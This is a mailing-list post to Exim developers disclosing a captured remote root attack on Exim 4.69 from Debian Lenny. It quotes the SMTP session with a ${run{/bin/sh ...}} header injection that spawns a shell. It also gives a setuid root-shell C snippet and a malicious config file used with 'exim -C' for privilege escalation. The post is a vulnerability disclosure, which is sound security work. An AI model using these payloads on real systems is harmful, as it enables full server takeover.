[exim-dev] Remote root vulnerability in Exim

Top Page

Reply to this message
Author: Sergey Kononenko
To: exim-dev
CC: pkg-exim4-maintainers
Subject: [exim-dev] Remote root vulnerability in Exim

While investigating security break in the network of my company, I've
captured (by tcpdump) sequence of successful remote root attack through
Exim. It was Exim from Debian Lenny (exim4-daemon-light 4.69-9). I
didn't find email of current maintainer of Exim, so I've decided to
write to this mailing lists. I don't want to publish all details of
attack before developers can investigate and fix vulnerability.
So I ask Exim maintainers to contact me and I will send them complete
captured sequence of attack.
Here I can put brief sequence of attack:

EHLO mail.domain.com
MAIL FROM: <orderruc0e@???>
RCPT TO: <postmaster@???>
MAILbombhdr0001: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0
MAILbombhdr0054: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0m
HeaderX: ${run{/bin/sh -c 'exec /bin/sh -i <&3 >&0 2>&0'}}${run{/bin/sh -c 'exec /bin/sh -i <&4 >&0 2>&0'}}........
about 700000 the same strings
MAIL FROM: <orderruc0e@???>
RCPT TO: <postmaster@???>

after that attacker gets shell with id of user Debian-exim and cwd
in /var/spool/exim4
then it put file there file setuid with trivial execution of root shell:
int main(int argc, char *argv[])
        setgroups(0, NULL);
        execl("/bin/sh", "sh", NULL);

and create another file e.conf with following content:
spool_directory = ${run{/bin/chown
root:root /var/spool/exim4/setuid}}${run{/bin/chmod 4755 /var/spool/exim4/setuid}}

the he runs:
exim -Ce.conf -q

and gets suid bit on /var/spool/exim4/setuid
everything else is trivial.

I haven't reproduced remote part of attack, but escalation from Debian-exim to
root works also at exim4-daemon-light 4.72-2 from Debian Squeeze.

With best regards,
Sergey Kononenko.